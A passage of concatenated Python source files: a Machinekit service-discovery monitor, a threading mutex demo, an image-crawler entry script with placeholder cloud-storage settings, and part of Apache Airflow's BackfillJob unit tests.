    # host -> last error message already printed, so a persistent failure is
    # reported once instead of once per polling cycle.
    issue = {}
    while True:
        with monitor.lock:
            # Snapshot under the lock so the slow HTTP requests run unlocked.
            explicit = copy.copy(monitor.explicit)
        for host in explicit:
            if not ':' in host:
                host += ':8088'  # default Machinekit REST port
            try:
                s = urllib.request.urlopen("http://%s/machinekit" % host).read()
                j = json.loads(s)
                # print('services:', [j[k] for k in j])
                with monitor.lock:
                    mk = None
                    for name in j:
                        props = j[name]
                        # Re-encode keys/values to bytes so the dict matches the
                        # property format used by the zeroconf discovery path.
                        properties = {}
                        for l in props:
                            properties[l.encode()] = props[l].encode()
                        uuid = properties[b'uuid']
                        mk = monitor.instance.get(uuid)
                        if mk is None:
                            mk = MachinekitInstance(uuid, properties)
                            monitor.instance[uuid] = mk
                        if mk.endpointFor(name) is None:
                            # dsn looks like 'tcp://<addr>:<port>' -> split on ':'
                            # gives ['tcp', '//<addr>', '<port>'].
                            dsn = props['dsn'].split(':')
                            mk._addService(properties, name, dsn[1].strip('/'), int(dsn[2]))
                    if not mk is None:
                        # Drop endpoints the host no longer advertises.
                        for service in mk.services():
                            if j.get(service) is None:
                                mk._removeService(service)
                issue[host] = None
            except Exception as e:
                # this happens when MK isn't running or the host isn't even routable
                err = str(e)
                if issue.get(host) != err:
                    print("%s - %s" % (host, err))
                    issue[host] = err
        time.sleep(1)
class ServiceMonitor(object):
    '''Singleton for the zeroconf service discovery. DO NOT USE.

    Browses for "_machinekit._tcp.local." services and additionally polls any
    explicitly configured REST servers in a daemon thread (see serviceThread).
    '''
    _Instance = None

    def __init__(self, explicit=None):
        self.zc = zeroconf.Zeroconf()
        self.browser = zeroconf.ServiceBrowser(self.zc, "_machinekit._tcp.local.", self)
        self.instance = {}  # uuid (bytes) -> MachinekitInstance
        self.explicit = explicit if explicit else MachinekitPreferences.restServers()
        self.lock = threading.Lock()
        self.thread = threading.Thread(target=serviceThread, args=(self,), daemon=True)
        self.thread.start()

    # zeroconf.ServiceBrowser interface
    def remove_service(self, zc, typ, name):
        '''Forget the endpoint named `name` on every known instance.'''
        with self.lock:
            for mkn, mk in self.instance.items():
                mk._removeService(name)

    def add_service(self, zc, typ, name):
        '''Register a newly resolved service with its MK instance.'''
        info = zc.get_service_info(typ, name)
        if info and info.properties.get(b'service'):
            with self.lock:
                uuid = info.properties[b'uuid']
                mk = self.instance.get(uuid)
                if not mk:
                    mk = MachinekitInstance(uuid, info.properties)
                    self.instance[uuid] = mk
                mk._addService(info.properties, info.name, info.address, info.port)
        else:
            # Fix: the original called PathLog.info() here, but PathLog is not
            # imported in this module and would raise NameError; report via
            # print() as the polling thread already does.  Also guard against
            # info being None (get_service_info can fail to resolve), which
            # previously raised AttributeError on info.name.
            if info:
                label = ' '.join(itertools.takewhile(lambda s: s != 'service', info.name.split()))
            else:
                label = name
            print("machinetalk.%-13s - no info" % (label))

    def instances(self, services):
        '''instances(services) ... return known instances providing all requested services.'''
        # NOTE(review): providesServices() is not defined on MachinekitInstance
        # in this module - verify it exists on the class used at runtime.
        with self.lock:
            return [mk for mkn, mk in self.instance.items() if services is None or mk.providesServices(services)]
|
mutex.py | import threading
# Shared state for the mutex demo below.
counter_buffer = 0               # incremented concurrently by the worker threads
counter_lock = threading.Lock()  # protects counter_buffer (when actually used)
COUNTER_MAX = 100                # increments performed by each worker
THREAD_COUNT = 5                 # number of worker threads spawned
def consumer1_counter():
    '''Increment the shared counter COUNTER_MAX times WITHOUT taking the lock.

    Intentionally racy - contrast with consumer2_counter, which locks.
    '''
    global counter_buffer
    for _ in range(COUNTER_MAX):
        # counter_lock.acquire()
        counter_buffer += 1
        # counter_lock.release()
def consumer2_counter():
    '''Safely increment the shared counter COUNTER_MAX times.

    Uses `with counter_lock:` instead of manual acquire()/release() so the
    lock is released even if the increment raises.
    '''
    global counter_buffer
    for _ in range(COUNTER_MAX):
        with counter_lock:
            counter_buffer += 1
# Spawn the racy incrementers concurrently: start ALL threads first, then join
# them all.  (The original loop started and joined each thread before creating
# the next, which ran them strictly one after another - so the data race this
# demo is meant to expose could never occur.)
threadList = []
for i in range(THREAD_COUNT):
    th = threading.Thread(target=consumer1_counter, args=(), name='thread')
    threadList.append(th)
for th in threadList:
    th.start()
for th in threadList:
    th.join()
# Without locking this may print less than THREAD_COUNT * COUNTER_MAX.
print(counter_buffer)
|
main.py | # _*_coding:utf-8_*_
# @Time : 2020/5/2 下午1:38
# @Author : Arics
# @Email : 739386753@qq.com
# @File : main.py
# @Software : PyCharm
# @IDE : PyCharm
import quequ_list
import spiderModule
import selectModule
from threading import Thread
import time
import log_record
import monitor
######
## Upyun (又拍云) account information
######
bucketName = "你的数据桶名称"
operatorName = "你的操作员名称"
password = "你的操作员密码"
######
## Mail settings
######
sendTime = 60  # interval between monitoring mails (seconds)
# Collaborators wired together once at import time and shared by all threads.
Quequ = quequ_list.quequ()
Select = selectModule.select(bucketName, operatorName, password)
Spider = spiderModule.spider(Quequ)
Monitor = monitor.monitor(Quequ, Spider, Select)
# Shutdown signal: worker loops run while this list is empty; appending any
# element stops them.
flag = []
def getPage(flag, ThreadName):
    '''Worker loop: fetch listing pages, extract URLs from them and feed the
    results back into the queue.  Runs until `flag` (shared list) is non-empty.
    '''
    while not flag:
        urlMSG = Quequ.outputPageUrl()
        url, code = urlMSG[0], urlMSG[1]
        response = Spider.getHTML(url)
        log_record.log_record("[Page][Message]", ThreadName, url)
        if response == -1:
            log_record.log_record("[Page][Warming]", ThreadName, "Get html error!")
        else:
            log_record.log_record("[Page][Message]", ThreadName, "Get a page-html.")
            urlList = Select.selectMain(response, code)
            log_record.log_record("[Page][Message]", ThreadName, "Get a urlList.")
            inputResult = Quequ.inputUrl(urlList)
            acceptedCount = inputResult['inputNum']
            log_record.log_record("[Page][Message]", ThreadName, "Input these url. >> " + str(acceptedCount) + '/' + str(len(urlList)))
def getPicture(flag, ThreadName):
    '''Worker loop: pull picture URLs from the queue, download and save them.
    Runs until `flag` (shared list) is non-empty.
    '''
    time.sleep(10)  # head start for getPage to fill the queue
    while not flag:
        urlMSG = Quequ.outputPicUrl()
        if urlMSG == -1:
            # Queue is empty: back off before polling again.
            time.sleep(30)
            log_record.log_record("[Picture][Message]", ThreadName, "The Picture-url is empty.")
        else:
            picUrl, picCode = urlMSG[0], urlMSG[1]
            log_record.log_record("[Picture][Message]", ThreadName, picUrl)
            response = Spider.getHTML(picUrl)
            if response == -1:
                log_record.log_record("[Picture][Message]", ThreadName, "Get Picture error!")
            else:
                result = Select.selectMain(response, picCode)
                log_record.log_record("[Picture][Message]", ThreadName, "Get a Picture successful.")
def moni(sendTime, flag):
    '''Monitoring loop: report status every `sendTime` seconds until `flag`
    (shared list) is non-empty.

    The first 10 reports use mode 0; every later report uses mode 1.
    '''
    ticks = 0
    while not flag:
        if ticks >= 10:
            Monitor.monitorMain(1)
        else:
            Monitor.monitorMain(0)
            ticks += 1
        time.sleep(sendTime)
def saveExit():
    '''Persist the crawler's progress; invoked once during shutdown.'''
    # Order matters only in that it mirrors the original: queue, parser, spider.
    for component in (Quequ, Select, Spider):
        component.saveExit()
if __name__ == '__main__':
    # Worker threads, started in this order: Picture first (it sleeps 10s
    # before consuming), then Page, then the monitor.
    workers = [
        Thread(name="Picture-1", target=getPicture, args=(flag, "Picture-1")),
        Thread(name="Page-1", target=getPage, args=(flag, "Page-1")),
        Thread(name="Monitor", target=moni, args=(sendTime, flag)),
    ]
    saver = Thread(name="saveExit", target=saveExit)
    for worker in workers:
        worker.start()
    # Any console input requests shutdown: appending to `flag` terminates
    # every worker's `while not flag` loop.
    input()
    flag.append(1)
    log_record.log_record("[Program][Message]", "Program", "Wait All Thread exit.")
    for worker in workers:
        worker.join()
    saver.start()
    saver.join()
    log_record.log_record("[Program][Message]", "Program", "Save data successful.")
    log_record.log_record("[Program][Message]", "Program", "Exit successful.")
|
test_jobs.py | # -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import datetime
import json
import logging
import multiprocessing
import os
import shutil
import threading
import time
import unittest
from tempfile import mkdtemp
import psutil
import six
import sqlalchemy
from mock import Mock, patch, MagicMock, PropertyMock
from parameterized import parameterized
from airflow.utils.db import create_session
from airflow import AirflowException, settings, models
from airflow import configuration
from airflow.bin import cli
import airflow.example_dags
from airflow.executors import BaseExecutor, SequentialExecutor
from airflow.jobs import BaseJob, BackfillJob, SchedulerJob, LocalTaskJob
from airflow.models import DAG, DagModel, DagBag, DagRun, Pool, TaskInstance as TI, \
errors
from airflow.models.slamiss import SlaMiss
from airflow.operators.bash_operator import BashOperator
from airflow.operators.dummy_operator import DummyOperator
from airflow.task.task_runner.base_task_runner import BaseTaskRunner
from airflow.utils import timezone
from airflow.utils.dag_processing import SimpleDag, SimpleDagBag, list_py_file_paths
from airflow.utils.dates import days_ago
from airflow.utils.db import provide_session
from airflow.utils.net import get_hostname
from airflow.utils.state import State
from airflow.utils.timeout import timeout
from tests.core import TEST_DAG_FOLDER
from tests.executors.test_executor import TestExecutor
configuration.load_test_config()

logger = logging.getLogger(__name__)

# Prefer the stdlib mock (py3); fall back to the external package, or None
# when neither is importable.
try:
    from unittest import mock
except ImportError:
    try:
        import mock
    except ImportError:
        mock = None

DEV_NULL = '/dev/null'
DEFAULT_DATE = timezone.datetime(2016, 1, 1)
TRY_NUMBER = 1
# Include the words "airflow" and "dag" in the file contents,
# tricking airflow into thinking these
# files contain a DAG (otherwise Airflow will skip them)
PARSEABLE_DAG_FILE_CONTENTS = '"airflow DAG"'
UNPARSEABLE_DAG_FILE_CONTENTS = 'airflow DAG'

# Filename to be used for dags that are created in an ad-hoc manner and can be removed/
# created at runtime
TEMP_DAG_FILENAME = "temp_dag.py"
# The 'dags' folder that lives next to this test file.
TEST_DAGS_FOLDER = os.path.join(
    os.path.dirname(os.path.realpath(__file__)), 'dags')
class BaseJobTest(unittest.TestCase):
    class TestJob(BaseJob):
        '''Minimal BaseJob whose _execute() simply invokes a supplied callback.'''
        __mapper_args__ = {
            'polymorphic_identity': 'TestJob'
        }

        def __init__(self, cb):
            self.cb = cb
            super(BaseJobTest.TestJob, self).__init__()

        def _execute(self):
            return self.cb()

    def test_state_success(self):
        '''A callback that returns normally leaves the job in SUCCESS.'''
        test_job = self.TestJob(lambda: True)
        test_job.run()
        self.assertEqual(test_job.state, State.SUCCESS)
        self.assertIsNotNone(test_job.end_date)

    def test_state_sysexit(self):
        '''sys.exit(0) raised by the callback still counts as a successful run.'''
        import sys
        test_job = self.TestJob(lambda: sys.exit(0))
        test_job.run()
        self.assertEqual(test_job.state, State.SUCCESS)
        self.assertIsNotNone(test_job.end_date)

    def test_state_failed(self):
        '''An exception from the callback propagates and marks the job FAILED.'''
        def boom():
            raise RuntimeError("fail")

        test_job = self.TestJob(boom)
        with self.assertRaises(RuntimeError):
            test_job.run()
        self.assertEqual(test_job.state, State.FAILED)
        self.assertIsNotNone(test_job.end_date)
class BackfillJobTest(unittest.TestCase):
def setUp(self):
with create_session() as session:
session.query(models.DagRun).delete()
session.query(models.Pool).delete()
session.query(models.TaskInstance).delete()
self.parser = cli.CLIFactory.get_parser()
self.dagbag = DagBag(include_examples=True)
    @unittest.skipIf('sqlite' in configuration.conf.get('core', 'sql_alchemy_conn'),
                     "concurrent access not supported in sqlite")
    def test_trigger_controller_dag(self):
        '''Backfilling the controller example DAG triggers runs of its target DAG.'''
        dag = self.dagbag.get_dag('example_trigger_controller_dag')
        target_dag = self.dagbag.get_dag('example_trigger_target_dag')
        dag.clear()
        target_dag.clear()

        # Before the backfill the target DAG has nothing to schedule.
        scheduler = SchedulerJob()
        queue = Mock()
        scheduler._process_task_instances(target_dag, queue=queue)
        self.assertFalse(queue.append.called)

        job = BackfillJob(
            dag=dag,
            start_date=DEFAULT_DATE,
            end_date=DEFAULT_DATE,
            ignore_first_depends_on_past=True
        )
        job.run()

        # The controller run should now have produced schedulable target tasks.
        scheduler = SchedulerJob()
        queue = Mock()
        scheduler._process_task_instances(target_dag, queue=queue)
        self.assertTrue(queue.append.called)
        target_dag.clear()
        dag.clear()
    @unittest.skipIf('sqlite' in configuration.conf.get('core', 'sql_alchemy_conn'),
                     "concurrent access not supported in sqlite")
    def test_backfill_multi_dates(self):
        '''A two-day backfill creates one successful DagRun per execution date.'''
        dag = self.dagbag.get_dag('example_bash_operator')
        dag.clear()

        job = BackfillJob(
            dag=dag,
            start_date=DEFAULT_DATE,
            end_date=DEFAULT_DATE + datetime.timedelta(days=1),
            ignore_first_depends_on_past=True
        )
        job.run()

        session = settings.Session()
        drs = session.query(DagRun).filter(
            DagRun.dag_id == 'example_bash_operator'
        ).order_by(DagRun.execution_date).all()

        # Exactly the two requested dates, both SUCCESS, in execution order.
        self.assertTrue(drs[0].execution_date == DEFAULT_DATE)
        self.assertTrue(drs[0].state == State.SUCCESS)
        self.assertTrue(drs[1].execution_date ==
                        DEFAULT_DATE + datetime.timedelta(days=1))
        self.assertTrue(drs[1].state == State.SUCCESS)

        dag.clear()
        session.close()
@unittest.skipIf('sqlite' in configuration.conf.get('core', 'sql_alchemy_conn'),
"concurrent access not supported in sqlite")
def test_backfill_examples(self):
"""
Test backfilling example dags
Try to backfill some of the example dags. Be careful, not all dags are suitable
for doing this. For example, a dag that sleeps forever, or does not have a
schedule won't work here since you simply can't backfill them.
"""
include_dags = {
'example_branch_operator',
'example_bash_operator',
'example_skip_dag',
'latest_only'
}
dags = [
dag for dag in self.dagbag.dags.values()
if 'example_dags' in dag.full_filepath and dag.dag_id in include_dags
]
for dag in dags:
dag.clear(
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE)
# Make sure that we have the dags that we want to test available
# in the example_dags folder, if this assertion fails, one of the
# dags in the include_dags array isn't available anymore
self.assertEqual(len(include_dags), len(dags))
for i, dag in enumerate(sorted(dags, key=lambda d: d.dag_id)):
logger.info('*** Running example DAG #{}: {}'.format(i, dag.dag_id))
job = BackfillJob(
dag=dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE,
ignore_first_depends_on_past=True)
job.run()
def test_backfill_conf(self):
dag = DAG(
dag_id='test_backfill_conf',
start_date=DEFAULT_DATE,
schedule_interval='@daily')
with dag:
DummyOperator(
task_id='op',
dag=dag)
dag.clear()
executor = TestExecutor(do_update=True)
conf = json.loads("""{"key": "value"}""")
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
conf=conf)
job.run()
dr = DagRun.find(dag_id='test_backfill_conf')
self.assertEqual(conf, dr[0].conf)
def test_backfill_run_rescheduled(self):
dag = DAG(
dag_id='test_backfill_run_rescheduled',
start_date=DEFAULT_DATE,
schedule_interval='@daily')
with dag:
DummyOperator(
task_id='test_backfill_run_rescheduled_task-1',
dag=dag,
)
dag.clear()
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
)
job.run()
ti = TI(task=dag.get_task('test_backfill_run_rescheduled_task-1'),
execution_date=DEFAULT_DATE)
ti.refresh_from_db()
ti.set_state(State.UP_FOR_RESCHEDULE)
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
rerun_failed_tasks=True
)
job.run()
ti = TI(task=dag.get_task('test_backfill_run_rescheduled_task-1'),
execution_date=DEFAULT_DATE)
ti.refresh_from_db()
self.assertEqual(ti.state, State.SUCCESS)
def test_backfill_rerun_failed_tasks(self):
dag = DAG(
dag_id='test_backfill_rerun_failed',
start_date=DEFAULT_DATE,
schedule_interval='@daily')
with dag:
DummyOperator(
task_id='test_backfill_rerun_failed_task-1',
dag=dag)
dag.clear()
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
)
job.run()
ti = TI(task=dag.get_task('test_backfill_rerun_failed_task-1'),
execution_date=DEFAULT_DATE)
ti.refresh_from_db()
ti.set_state(State.FAILED)
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
rerun_failed_tasks=True
)
job.run()
ti = TI(task=dag.get_task('test_backfill_rerun_failed_task-1'),
execution_date=DEFAULT_DATE)
ti.refresh_from_db()
self.assertEqual(ti.state, State.SUCCESS)
def test_backfill_rerun_upstream_failed_tasks(self):
dag = DAG(
dag_id='test_backfill_rerun_upstream_failed',
start_date=DEFAULT_DATE,
schedule_interval='@daily')
with dag:
t1 = DummyOperator(task_id='test_backfill_rerun_upstream_failed_task-1',
dag=dag)
t2 = DummyOperator(task_id='test_backfill_rerun_upstream_failed_task-2',
dag=dag)
t1.set_upstream(t2)
dag.clear()
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
)
job.run()
ti = TI(task=dag.get_task('test_backfill_rerun_upstream_failed_task-1'),
execution_date=DEFAULT_DATE)
ti.refresh_from_db()
ti.set_state(State.UPSTREAM_FAILED)
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
rerun_failed_tasks=True
)
job.run()
ti = TI(task=dag.get_task('test_backfill_rerun_upstream_failed_task-1'),
execution_date=DEFAULT_DATE)
ti.refresh_from_db()
self.assertEqual(ti.state, State.SUCCESS)
def test_backfill_rerun_failed_tasks_without_flag(self):
dag = DAG(
dag_id='test_backfill_rerun_failed',
start_date=DEFAULT_DATE,
schedule_interval='@daily')
with dag:
DummyOperator(
task_id='test_backfill_rerun_failed_task-1',
dag=dag)
dag.clear()
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
)
job.run()
ti = TI(task=dag.get_task('test_backfill_rerun_failed_task-1'),
execution_date=DEFAULT_DATE)
ti.refresh_from_db()
ti.set_state(State.FAILED)
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
rerun_failed_tasks=False
)
with self.assertRaises(AirflowException):
job.run()
def test_backfill_ordered_concurrent_execute(self):
dag = DAG(
dag_id='test_backfill_ordered_concurrent_execute',
start_date=DEFAULT_DATE,
schedule_interval="@daily")
with dag:
op1 = DummyOperator(task_id='leave1')
op2 = DummyOperator(task_id='leave2')
op3 = DummyOperator(task_id='upstream_level_1')
op4 = DummyOperator(task_id='upstream_level_2')
op5 = DummyOperator(task_id='upstream_level_3')
# order randomly
op2.set_downstream(op3)
op1.set_downstream(op3)
op4.set_downstream(op5)
op3.set_downstream(op4)
dag.clear()
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
)
job.run()
# test executor history keeps a list
history = executor.history
# check if right order. Every loop has a 'pause' (0) to change state
# from RUNNING to SUCCESS.
# 6,0,3,0,3,0,3,0 = 8 loops
self.assertEqual(8, len(history))
loop_count = 0
while len(history) > 0:
queued_tasks = history.pop(0)
if loop_count == 0:
# first loop should contain 6 tasks (3 days x 2 tasks)
self.assertEqual(6, len(queued_tasks))
if loop_count == 2 or loop_count == 4 or loop_count == 6:
# 3 days x 1 task
self.assertEqual(3, len(queued_tasks))
loop_count += 1
    def test_backfill_pooled_tasks(self):
        """
        Test that queued tasks are executed by BackfillJob
        """
        session = settings.Session()
        # A single-slot pool forces the task through the QUEUED state first.
        pool = Pool(pool='test_backfill_pooled_task_pool', slots=1)
        session.add(pool)
        session.commit()

        dag = self.dagbag.get_dag('test_backfill_pooled_task_dag')
        dag.clear()

        job = BackfillJob(
            dag=dag,
            start_date=DEFAULT_DATE,
            end_date=DEFAULT_DATE)

        # run with timeout because this creates an infinite loop if not
        # caught
        with timeout(seconds=30):
            job.run()

        ti = TI(
            task=dag.get_task('test_backfill_pooled_task'),
            execution_date=DEFAULT_DATE)
        ti.refresh_from_db()
        self.assertEqual(ti.state, State.SUCCESS)
    def test_backfill_depends_on_past(self):
        """
        Test that backfill respects ignore_depends_on_past
        """
        dag = self.dagbag.get_dag('test_depends_on_past')
        dag.clear()
        # A date whose previous schedule never ran.
        run_date = DEFAULT_DATE + datetime.timedelta(days=5)

        # backfill should deadlock
        self.assertRaisesRegexp(
            AirflowException,
            'BackfillJob is deadlocked',
            BackfillJob(dag=dag, start_date=run_date, end_date=run_date).run)

        # With the flag, the first run skips the depends_on_past check.
        BackfillJob(
            dag=dag,
            start_date=run_date,
            end_date=run_date,
            ignore_first_depends_on_past=True).run()

        # ti should have succeeded
        ti = TI(dag.tasks[0], run_date)
        ti.refresh_from_db()
        self.assertEqual(ti.state, State.SUCCESS)
def test_run_ignores_all_dependencies(self):
"""
Test that run respects ignore_all_dependencies
"""
dag_id = 'test_run_ignores_all_dependencies'
dag = self.dagbag.get_dag('test_run_ignores_all_dependencies')
dag.clear()
task0_id = 'test_run_dependent_task'
args0 = ['run',
'-A',
dag_id,
task0_id,
DEFAULT_DATE.isoformat()]
cli.run(self.parser.parse_args(args0))
ti_dependent0 = TI(
task=dag.get_task(task0_id),
execution_date=DEFAULT_DATE)
ti_dependent0.refresh_from_db()
self.assertEqual(ti_dependent0.state, State.FAILED)
task1_id = 'test_run_dependency_task'
args1 = ['run',
'-A',
dag_id,
task1_id,
(DEFAULT_DATE + datetime.timedelta(days=1)).isoformat()]
cli.run(self.parser.parse_args(args1))
ti_dependency = TI(
task=dag.get_task(task1_id),
execution_date=DEFAULT_DATE + datetime.timedelta(days=1))
ti_dependency.refresh_from_db()
self.assertEqual(ti_dependency.state, State.FAILED)
task2_id = 'test_run_dependent_task'
args2 = ['run',
'-A',
dag_id,
task2_id,
(DEFAULT_DATE + datetime.timedelta(days=1)).isoformat()]
cli.run(self.parser.parse_args(args2))
ti_dependent = TI(
task=dag.get_task(task2_id),
execution_date=DEFAULT_DATE + datetime.timedelta(days=1))
ti_dependent.refresh_from_db()
self.assertEqual(ti_dependent.state, State.SUCCESS)
def test_run_naive_taskinstance(self):
"""
Test that we can run naive (non-localized) task instances
"""
NAIVE_DATE = datetime.datetime(2016, 1, 1)
dag_id = 'test_run_ignores_all_dependencies'
dag = self.dagbag.get_dag('test_run_ignores_all_dependencies')
dag.clear()
task0_id = 'test_run_dependent_task'
args0 = ['run',
'-A',
dag_id,
task0_id,
NAIVE_DATE.isoformat()]
cli.run(self.parser.parse_args(args0))
ti_dependent0 = TI(
task=dag.get_task(task0_id),
execution_date=NAIVE_DATE)
ti_dependent0.refresh_from_db()
self.assertEqual(ti_dependent0.state, State.FAILED)
    def test_cli_backfill_depends_on_past(self):
        """
        Test that CLI respects -I argument
        """
        dag_id = 'test_dagrun_states_deadlock'
        run_date = DEFAULT_DATE + datetime.timedelta(days=1)
        # '-l' = local run, '-s' = start date; deliberately no '-I' yet.
        args = [
            'backfill',
            dag_id,
            '-l',
            '-s',
            run_date.isoformat(),
        ]
        dag = self.dagbag.get_dag(dag_id)
        dag.clear()

        # Without -I the depends_on_past chain can never start -> deadlock.
        self.assertRaisesRegexp(
            AirflowException,
            'BackfillJob is deadlocked',
            cli.backfill,
            self.parser.parse_args(args))

        cli.backfill(self.parser.parse_args(args + ['-I']))
        ti = TI(dag.get_task('test_depends_on_past'), run_date)
        ti.refresh_from_db()
        # task ran
        self.assertEqual(ti.state, State.SUCCESS)
        dag.clear()
def test_cli_backfill_depends_on_past_backwards(self):
"""
Test that CLI respects -B argument and raises on interaction with depends_on_past
"""
dag_id = 'test_depends_on_past'
start_date = DEFAULT_DATE + datetime.timedelta(days=1)
end_date = start_date + datetime.timedelta(days=1)
args = [
'backfill',
dag_id,
'-l',
'-s',
start_date.isoformat(),
'-e',
end_date.isoformat(),
'-I'
]
dag = self.dagbag.get_dag(dag_id)
dag.clear()
cli.backfill(self.parser.parse_args(args + ['-I']))
ti = TI(dag.get_task('test_dop_task'), end_date)
ti.refresh_from_db()
# runs fine forwards
self.assertEqual(ti.state, State.SUCCESS)
# raises backwards
expected_msg = 'You cannot backfill backwards because one or more tasks depend_on_past: {}'.format(
'test_dop_task')
self.assertRaisesRegexp(
AirflowException,
expected_msg,
cli.backfill,
self.parser.parse_args(args + ['-B']))
def test_cli_receives_delay_arg(self):
"""
Tests that the --delay argument is passed correctly to the BackfillJob
"""
dag_id = 'example_bash_operator'
run_date = DEFAULT_DATE
args = [
'backfill',
dag_id,
'-s',
run_date.isoformat(),
'--delay_on_limit',
'0.5',
]
parsed_args = self.parser.parse_args(args)
self.assertEqual(0.5, parsed_args.delay_on_limit)
def _get_dag_test_max_active_limits(self, dag_id, max_active_runs=1):
dag = DAG(
dag_id=dag_id,
start_date=DEFAULT_DATE,
schedule_interval="@hourly",
max_active_runs=max_active_runs
)
with dag:
op1 = DummyOperator(task_id='leave1')
op2 = DummyOperator(task_id='leave2')
op3 = DummyOperator(task_id='upstream_level_1')
op4 = DummyOperator(task_id='upstream_level_2')
op1 >> op2 >> op3
op4 >> op3
dag.clear()
return dag
def test_backfill_max_limit_check_within_limit(self):
dag = self._get_dag_test_max_active_limits(
'test_backfill_max_limit_check_within_limit',
max_active_runs=16)
start_date = DEFAULT_DATE - datetime.timedelta(hours=1)
end_date = DEFAULT_DATE
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=dag,
start_date=start_date,
end_date=end_date,
executor=executor,
donot_pickle=True)
job.run()
dagruns = DagRun.find(dag_id=dag.dag_id)
self.assertEqual(2, len(dagruns))
self.assertTrue(all([run.state == State.SUCCESS for run in dagruns]))
    def test_backfill_max_limit_check(self):
        '''A RUNNING DagRun outside the backfill range blocks the backfill
        (max_active_runs=1) until that run is marked SUCCESS from this thread.'''
        dag_id = 'test_backfill_max_limit_check'
        run_id = 'test_dagrun'
        start_date = DEFAULT_DATE - datetime.timedelta(hours=1)
        end_date = DEFAULT_DATE

        # Hands control between this thread and the backfill thread below.
        dag_run_created_cond = threading.Condition()

        def run_backfill(cond):
            cond.acquire()
            try:
                dag = self._get_dag_test_max_active_limits(dag_id)

                # this session object is different than the one in the main thread
                thread_session = settings.Session()

                # Existing dagrun that is not within the backfill range
                dag.create_dagrun(
                    run_id=run_id,
                    state=State.RUNNING,
                    execution_date=DEFAULT_DATE + datetime.timedelta(hours=1),
                    start_date=DEFAULT_DATE,
                )
                thread_session.commit()
                cond.notify()
            finally:
                cond.release()

            executor = TestExecutor(do_update=True)
            job = BackfillJob(dag=dag,
                              start_date=start_date,
                              end_date=end_date,
                              executor=executor,
                              donot_pickle=True)
            job.run()
            thread_session.close()

        backfill_job_thread = threading.Thread(target=run_backfill,
                                               name="run_backfill",
                                               args=(dag_run_created_cond,))

        dag_run_created_cond.acquire()
        session = settings.Session()
        backfill_job_thread.start()
        try:
            # at this point backfill can't run since the max_active_runs has been
            # reached, so it is waiting
            dag_run_created_cond.wait(timeout=1.5)
            dagruns = DagRun.find(dag_id=dag_id)
            dr = dagruns[0]
            self.assertEqual(1, len(dagruns))
            self.assertEqual(dr.run_id, run_id)

            # allow the backfill to execute by setting the existing dag run to SUCCESS,
            # backfill will execute dag runs 1 by 1
            dr.set_state(State.SUCCESS)
            session.merge(dr)
            session.commit()
            session.close()

            backfill_job_thread.join()

            dagruns = DagRun.find(dag_id=dag_id)
            self.assertEqual(3, len(dagruns))  # 2 from backfill + 1 existing
            self.assertEqual(dagruns[-1].run_id, dr.run_id)
        finally:
            dag_run_created_cond.release()
    def test_backfill_max_limit_check_no_count_existing(self):
        '''A RUNNING DagRun inside the backfill range does not count against
        max_active_runs; backfill completes it instead of being blocked.'''
        dag = self._get_dag_test_max_active_limits(
            'test_backfill_max_limit_check_no_count_existing')
        start_date = DEFAULT_DATE
        end_date = DEFAULT_DATE

        # Existing dagrun that is within the backfill range
        dag.create_dagrun(run_id="test_existing_backfill",
                          state=State.RUNNING,
                          execution_date=DEFAULT_DATE,
                          start_date=DEFAULT_DATE)
        executor = TestExecutor(do_update=True)
        job = BackfillJob(dag=dag,
                          start_date=start_date,
                          end_date=end_date,
                          executor=executor,
                          donot_pickle=True)
        job.run()

        # BackfillJob will run since the existing DagRun does not count for the max
        # active limit since it's within the backfill date range.
        dagruns = DagRun.find(dag_id=dag.dag_id)
        # will only be able to run 1 (the existing one) since there's just
        # one dag run slot left given the max_active_runs limit
        self.assertEqual(1, len(dagruns))
        self.assertEqual(State.SUCCESS, dagruns[0].state)
def test_backfill_max_limit_check_complete_loop(self):
dag = self._get_dag_test_max_active_limits(
'test_backfill_max_limit_check_complete_loop')
start_date = DEFAULT_DATE - datetime.timedelta(hours=1)
end_date = DEFAULT_DATE
# Given the max limit to be 1 in active dag runs, we need to run the
# backfill job 3 times
success_expected = 2
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=dag,
start_date=start_date,
end_date=end_date,
executor=executor,
donot_pickle=True)
job.run()
